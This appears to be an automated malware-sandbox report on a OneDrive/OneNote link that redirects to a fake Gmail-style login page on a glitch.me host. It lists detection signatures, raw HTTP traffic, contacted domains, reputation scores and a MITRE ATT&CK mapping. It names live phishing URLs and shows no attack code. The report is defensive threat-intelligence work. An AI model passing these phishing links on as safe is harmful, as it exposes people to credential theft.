Edit tour

Windows Analysis Report
https://1drv.ms/o/s!BHKIhV1bB5BYgmk0Y3amEiFjpOkm?e=4jMd_F12EUOBJkiyUyiEYw&at=9

Overview

General Information

Sample URL:	https://1drv.ms/o/s!BHKIhV1bB5BYgmk0Y3amEiFjpOkm?e=4jMd_F12EUOBJkiyUyiEYw&at=9
Analysis ID:	562252
Infos:

Detection

HTMLPhisher

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Phishing site detected (based on favicon image match)

Yara detected HtmlPhish10

Antivirus detection for URL or domain

Phishing site detected (based on logo template match)

Phishing site detected (based on image similarity)

Yara signature match

No HTML title found

HTML body contains low number of good links

Classification

Process Tree

System is w10x64

chrome.exe (PID: 5916 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --enable-automation "https://1drv.ms/o/s!BHKIhV1bB5BYgmk0Y3amEiFjpOkm?e=4jMd_F12EUOBJkiyUyiEYw&at=9 MD5: C139654B5C1438A95B321BB01AD63EF6)

chrome.exe (PID: 5204 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1660,188383026965401033,7131490049536642209,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1780 /prefetch:8 MD5: C139654B5C1438A95B321BB01AD63EF6)

cleanup

HTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: unknown

DNS traffic detected: queries for: accounts.google.com

Source: global traffic	HTTP traffic detected: GET /o/s!BHKIhV1bB5BYgmk0Y3amEiFjpOkm?e=4jMd_F12EUOBJkiyUyiEYw&at=9 HTTP/1.1Host: 1drv.msConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /crx/blobs/Acy1k0bLIjHsvnKaKN_oRpVaYYvFs25d7GKYF1WXrT6yizCMksBO0c_ggE0B6tx6HPRHe6q1GOEe3_NcIbSiGG8kXeLMUY0sAKVvC6R89zvKM13s5VqoAMZSmuUgjQL5vlygJuArQghXXE_qTL7NlQ/extension_8520_615_0_5.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /api/proxy?v=3 HTTP/1.1Host: skyapi.onedrive.live.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://onedrive.live.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: xid=dbfd2c72-fe4c-40c9-9f16-9295c1417bc0&&RD0003FF9C195C&60; wla42=; mkt=en-US; xidseq=3; E=P:W5MLqHri2Yg=:XZwRAMVv+FBam385/rnbcor4xrRNRRQzBG/GSlyXjZE=:F
Source: global traffic	HTTP traffic detected: GET /mydata/myprofile/expressionprofile/profilephoto:UserTileStatic,UserTileSmall/MeControlMediumUserTile?ck=1&ex=24&fofoff=1&sc=1643419484127 HTTP/1.1Host: storage.live.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: image/avif,image/webp,image/apng,image/,/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onenote.officeapps.live.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: xid=dbfd2c72-fe4c-40c9-9f16-9295c1417bc0&&RD0003FF9C195C&60; wla42=; mkt=en-US; xidseq=3; E=P:W5MLqHri2Yg=:XZwRAMVv+FBam385/rnbcor4xrRNRRQzBG/GSlyXjZE=:F; BP=l=SDX.Skydrive&FR=&ST=; MUID=3D609D24E268600A10D48C1EE668644C
Source: global traffic	HTTP traffic detected: GET /freedo.html HTTP/1.1Host: magenta-flicker-surprise.glitch.meConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /css/hover.css HTTP/1.1Host: magenta-flicker-surprise.glitch.meConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://magenta-flicker-surprise.glitch.me/freedo.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /bootstrap/4.0.0/css/bootstrap.min.css HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-aliveOrigin: https://magenta-flicker-surprise.glitch.meUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://magenta-flicker-surprise.glitch.me/freedo.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /gmail.com HTTP/1.1Host: logo.clearbit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: image/avif,image/webp,image/apng,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://magenta-flicker-surprise.glitch.me/freedo.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-aliveOrigin: https://magenta-flicker-surprise.glitch.meUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://magenta-flicker-surprise.glitch.me/freedo.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveOrigin: https://magenta-flicker-surprise.glitch.meUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://magenta-flicker-surprise.glitch.me/freedo.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /css/hover.css HTTP/1.1Host: magenta-flicker-surprise.glitch.meConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://magenta-flicker-surprise.glitch.me/freedo.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /images/sampledata/hack-run.png HTTP/1.1Host: shopget24.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: image/avif,image/webp,image/apng,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /83cffd1ebf23ed93aa925eb9529f5348.png HTTP/1.1Host: i.gyazo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: image/avif,image/webp,image/apng,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://magenta-flicker-surprise.glitch.me/freedo.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /83cffd1ebf23ed93aa925eb9529f5348.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36Host: i.gyazo.com
Source: global traffic	HTTP traffic detected: GET /images/sampledata/hack-run.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36Host: shopget24.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/sampledata/hack-run.png HTTP/1.1Host: shopget24.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: image/avif,image/webp,image/apng,image/,/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /images/sampledata/hack-run.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36Host: shopget24.com

Source: unknown	HTTPS traffic detected: 104.19.143.111:443 -> 192.168.2.6:49976 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.219.248.46:443 -> 192.168.2.6:49979 version: TLS 1.2

Source: 13645.4.pages.csv, type: HTML

Matched rule: SUSP_obfuscated_JS_obfuscatorio date = 2021-08-25, author = @imp0rtp3, description = Detect JS obfuscation done by the js obfuscator (often malicious), reference = https://obfuscator.io, score =

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --enable-automation "https://1drv.ms/o/s!BHKIhV1bB5BYgmk0Y3amEiFjpOkm?e=4jMd_F12EUOBJkiyUyiEYw&at=9
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1660,188383026965401033,7131490049536642209,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1780 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1660,188383026965401033,7131490049536642209,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1780 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Program Files\Google\Chrome\Application\Dictionaries

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-61F49744-171C.pma

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Local\Temp\8948aa28-1d9e-404e-9621-12e03e91044a.tmp

Jump to behavior

Source: classification engine

Classification label: mal72.phis.win@34/259@27/15

Source: QuotaManager.0.dr

Binary or memory string: CREATE TABLE HostQuotaTable(host TEXT NOT NULL, type INTEGER NOT NULL, quota INTEGER DEFAULT 0, UNIQUE(host, type));

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic			Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	1 Process Injection	3 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	4 Non-Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	5 Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	3 Ingress Tool Transfer	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
https://1drv.ms/o/s!BHKIhV1bB5BYgmk0Y3amEiFjpOkm?e=4jMd_F12EUOBJkiyUyiEYw&at=9	0%	Virustotal		Browse
https://1drv.ms/o/s!BHKIhV1bB5BYgmk0Y3amEiFjpOkm?e=4jMd_F12EUOBJkiyUyiEYw&at=9	0%	Avira URL Cloud	safe

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Local\Temp\5916_1070667582\_platform_specific\x86_64\pnacl_public_x86_64_ld_nexe	0%	Metadefender	Browse
C:\Users\user\AppData\Local\Temp\5916_1070667582\_platform_specific\x86_64\pnacl_public_x86_64_ld_nexe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\5916_1070667582\_platform_specific\x86_64\pnacl_public_x86_64_pnacl_llc_nexe	0%	Metadefender	Browse
C:\Users\user\AppData\Local\Temp\5916_1070667582\_platform_specific\x86_64\pnacl_public_x86_64_pnacl_llc_nexe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\5916_1070667582\_platform_specific\x86_64\pnacl_public_x86_64_pnacl_sz_nexe	0%	Metadefender	Browse
C:\Users\user\AppData\Local\Temp\5916_1070667582\_platform_specific\x86_64\pnacl_public_x86_64_pnacl_sz_nexe	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
https://magenta-flicker-surprise.glitch.me/freedo.html	100%	SlashNext	Fake Login Page type: Phishing & Social usering
http://crls.pki.goog/gts1c3/QqFxbi9M48c.crl0	0%	URL Reputation	safe
https://shopget24.com/images/sampledata/hack-run.png	3%	Virustotal		Browse
https://shopget24.com/images/sampledata/hack-run.png	100%	Avira URL Cloud	phishing
http://pki.goog/repo/certs/gtsr1.der04	0%	URL Reputation	safe
https://shopget24.com/images/sampledata/hack-run.pngp	0%	Avira URL Cloud	safe
http://shopget24.com/images/sampledata/hack-run.pngD	0%	Avira URL Cloud	safe
https://dns.google	0%	URL Reputation	safe
https://onedrive.live.comh	0%	URL Reputation	safe
https://www.google.com;	0%	Avira URL Cloud	safe
http://crl.pki.goog/gtsr1/gtsr1.crl0W	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://csp.withgoogle.com/csp/hosted-libraries-pushers	0%	URL Reputation	safe
http://crl.pki.goog/gsr1/gsr1.crl0;	0%	URL Reputation	safe
http://shopget24.com/images/sampledata/hack-run.png	0%	Avira URL Cloud	safe
https://csp.withgoogle.com/csp/report-to/hosted-libraries-pushers	0%	URL Reputation	safe
https://amcdn.msftauth.net/me?partner=OneNoteOnline&version=10.21153.1&market=EN-US&wrapperId=suites	0%	URL Reputation	safe
https://shopget24.com/images/sampledata/hack-run.pngx-turbo-charged-by:	0%	Avira URL Cloud	safe
http://pki.goog/gsr1/gsr1.crt02	0%	URL Reputation	safe
https://onedrive.live.comX-Content-Type-Options:	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
gstaticadssl.l.google.com	216.58.215.227	true	false	high
accounts.google.com	142.250.203.109	true	false	high
i.gyazo.com	104.19.143.111	true	false	high
maxcdn.bootstrapcdn.com	104.18.11.207	true	false	high
magenta-flicker-surprise.glitch.me	18.209.2.231	true	false	high
i-am3p-cor002.api.p001.1drv.com	40.90.142.226	true	false	high
1drv.ms	13.107.42.12	true	false	high
d26p066pn2w0s0.cloudfront.net	65.9.61.53	true	false	high
i-am3p-cor006.api.p001.1drv.com	13.104.158.180	true	false	high
cdnjs.cloudflare.com	104.16.18.94	true	false	high
clients.l.google.com	142.250.203.110	true	false	high
shopget24.com	104.219.248.46	true	false	unknown
googlehosted.l.googleusercontent.com	172.217.168.33	true	false	high
onenoteonlinesync.onenote.com	unknown	unknown	false	high
messaging.office.com	unknown	unknown	false	high
c.live.com	unknown	unknown	false	high
ajax.aspnetcdn.com	unknown	unknown	false	high
storage.live.com	unknown	unknown	false	high
skyapi.onedrive.live.com	unknown	unknown	false	high
clients2.googleusercontent.com	unknown	unknown	false	high
clients2.google.com	unknown	unknown	false	high
code.jquery.com	unknown	unknown	false	high
onedrive.live.com	unknown	unknown	false	high
p.sfx.ms	unknown	unknown	false	high
amcdn.msftauth.net	unknown	unknown	false	unknown
spoprod-a.akamaihd.net	unknown	unknown	false	high
www.onenote.com	unknown	unknown	false	high
logo.clearbit.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://i.gyazo.com/83cffd1ebf23ed93aa925eb9529f5348.png	false		high
https://magenta-flicker-surprise.glitch.me/freedo.html	false	SlashNext: Fake Login Page type: Phishing & Social usering	high
https://magenta-flicker-surprise.glitch.me/css/hover.css	false		high
https://shopget24.com/images/sampledata/hack-run.png	false	3%, Virustotal, Browse Avira URL Cloud: phishing	unknown
https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js	false		high
https://onedrive.live.com/view.aspx?resid=5890075B5D858872!361&ithint=onenote&authkey=!AjRjdqYSIWOk6SY	false		high
https://magenta-flicker-surprise.glitch.me/freedo.html	false	SlashNext: Fake Login Page type: Phishing & Social usering	high
https://1drv.ms/o/s!BHKIhV1bB5BYgmk0Y3amEiFjpOkm?e=4jMd_F12EUOBJkiyUyiEYw&at=9	false		high
https://logo.clearbit.com/gmail.com	false		high
http://shopget24.com/images/sampledata/hack-run.png	false	Avira URL Cloud: safe	unknown
https://clients2.googleusercontent.com/crx/blobs/Acy1k0bLIjHsvnKaKN_oRpVaYYvFs25d7GKYF1WXrT6yizCMksBO0c_ggE0B6tx6HPRHe6q1GOEe3_NcIbSiGG8kXeLMUY0sAKVvC6R89zvKM13s5VqoAMZSmuUgjQL5vlygJuArQghXXE_qTL7NlQ/extension_8520_615_0_5.crx	false		high
https://onedrive.live.com/redir?resid=5890075B5D858872%21361&authkey=%21AjRjdqYSIWOk6SY&page=View&wd=target%28SETTLEMENT%20STATEMENT.one%7C%2FProtrack%20Solutions%20Limited%7C3862be63-9354-4152-aaeb-9aa40f5d9f43%2F%29	false		high
https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard	false		high
https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://onedrive.live.com/redir?resid=5890075B5D858872	data_3.2.dr, Current Session.0.dr	false		high
https://onedrive.live.com/Handlers/Plt.mvc?bicild=&v=0.0.0	data_1.2.dr	false		high
https://code.jquery.com/jquery-3.2.1.slim.min.js	data_1.2.dr	false		high
https://magenta-flicker-surprise.glitch.me/	Network Action Predictor.0.dr	false		high
https://logo.clearbit.com/gmail.comkf	data_1.2.dr	false		high
https://p.sfx.ms/is/invis.gif	data_1.2.dr	false		high
http://crls.pki.goog/gts1c3/QqFxbi9M48c.crl0	data_3.2.dr	false	URL Reputation: safe	unknown
http://www.ietf.org/id/draft-holmer-rmcat-transport-wide-cc-extensions-01	mirroring_hangouts.js.0.dr	false		high
https://onedrive.live.com/	Current Session.0.dr	false		high
https://preprod-hangouts-googleapis.sandbox.google.com	mirroring_hangouts.js.0.dr	false		high
http://pki.goog/repo/certs/gtsr1.der04	data_3.2.dr	false	URL Reputation: safe	unknown
https://www.google.com	5173a041-abc9-496c-9de9-8d9fece84bb7.tmp.2.dr, f3469627-cdf8-4b49-87a4-91b8da1b0944.tmp.2.dr, manifest.json0.0.dr, 9f8fd026-4c5d-49d2-8bb9-aa76b918a01a.tmp.2.dr	false		high
https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.7.2.min.js	data_1.2.dr	false		high
https://spoprod-a.akamaihd.net/files/onedrive-website-release-prod_master_20210924.001//filescss2-78	data_1.2.dr	false		high
https://spoprod-a.akamaihd.net/files/onedrive-website-release-prod_master_20210924.001/wac2-bf8b3319	data_1.2.dr	false		high
https://hangouts.google.com/hangouts/_/logpref	mirroring_hangouts.js.0.dr	false		high
https://creativecommons.org/publicdomain/zero/1.0/.	mirroring_hangouts.js.0.dr	false		high
https://shopget24.com/images/sampledata/hack-run.pngp	data_1.2.dr	false	Avira URL Cloud: safe	unknown
https://www.google.com/accounts/OAuthLogin?issueuberauth=1	craw_window.js.0.dr	false		high
https://github.com/madler/zlib/blob/master/zlib.h	mirroring_hangouts.js.0.dr	false		high
http://shopget24.com/images/sampledata/hack-run.pngD	data_1.2.dr	false	Avira URL Cloud: safe	unknown
https://spoprod-a.akamaihd.net/files/onedrive-website-release-prod_master_20210924.001//maincss-3d63	data_1.2.dr	false		high
https://dns.google	5eef011a-ef80-4190-b459-3b55c7d34d63.tmp.2.dr, 5173a041-abc9-496c-9de9-8d9fece84bb7.tmp.2.dr, f3469627-cdf8-4b49-87a4-91b8da1b0944.tmp.2.dr, fbd8880a-7af6-4d47-9f74-404a31517fc6.tmp.2.dr, 9f8fd026-4c5d-49d2-8bb9-aa76b918a01a.tmp.2.dr	false	URL Reputation: safe	unknown
https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p	craw_window.js.0.dr, craw_background.js.0.dr	false		high
https://spoprod-a.akamaihd.net/files/onedrive-website-release-prod_master_20210924.001//filescss1-11	data_1.2.dr	false		high
https://onedrive.live.comh	Current Session.0.dr	false	URL Reputation: safe	unknown
https://support.google.com/chromecast/troubleshooter/2995236	messages.json41.0.dr, messages.json15.0.dr, messages.json5.0.dr, messages.json29.0.dr, feedback.html.0.dr, messages.json23.0.dr, messages.json71.0.dr, messages.json73.0.dr, messages.json59.0.dr, messages.json27.0.dr, messages.json83.0.dr, messages.json79.0.dr, messages.json25.0.dr, messages.json82.0.dr, messages.json44.0.dr, messages.json46.0.dr, messages.json70.0.dr, messages.json0.0.dr, messages.json85.0.dr, messages.json88.0.dr, messages.json14.0.dr	false		high
http://www.ietf.org/id/draft-holmer-rmcat-transport-wide-cc-extensions	mirroring_hangouts.js.0.dr	false		high
https://maxcdn.bootstrapcdn.com/	Network Action Predictor.0.dr	false		high
https://spoprod-a.akamaihd.net/files/onedrive-website-release-prod_master_20210924.001/wac1-cdc297b4	data_1.2.dr	false		high
https://onedrive.live.com/view.aspx?resid=5890075B5D858872	Current Session.0.dr	false		high
https://payments.google.com/payments/v4/js/integrator.js	craw_window.js.0.dr, manifest.json.0.dr	false		high
https://www.google.com;	manifest.json0.0.dr	false	Avira URL Cloud: safe	low
http://crl.pki.goog/gtsr1/gtsr1.crl0W	data_3.2.dr	false	URL Reputation: safe	unknown
https://spoprod-a.akamaihd.net/files/fabric/assets/icons/fabricmdl2icons.woff	data_1.2.dr	false		high
https://pki.goog/repository/0	data_3.2.dr	false	URL Reputation: safe	unknown
https://csp.withgoogle.com/csp/hosted-libraries-pushers	data_3.2.dr	false	URL Reputation: safe	unknown
https://www.google.com/images/x2.gif	craw_window.js.0.dr	false		high
https://www.onenote.com	data_3.2.dr	false		high
https://www.google.com/images/dot2.gif	craw_window.js.0.dr	false		high
https://play.google.com/log?format=json&hasfast=true	mirroring_hangouts.js.0.dr	false		high
https://www.onenote.com/	000003.log5.0.dr	false		high
https://onedrive.live.com/Handlers/Plt.mvc?bicild=&v=0.0.0GIF89a	data_1.2.dr	false		high
http://tools.ietf.org/html/rfc1950	mirroring_hangouts.js.0.dr	false		high
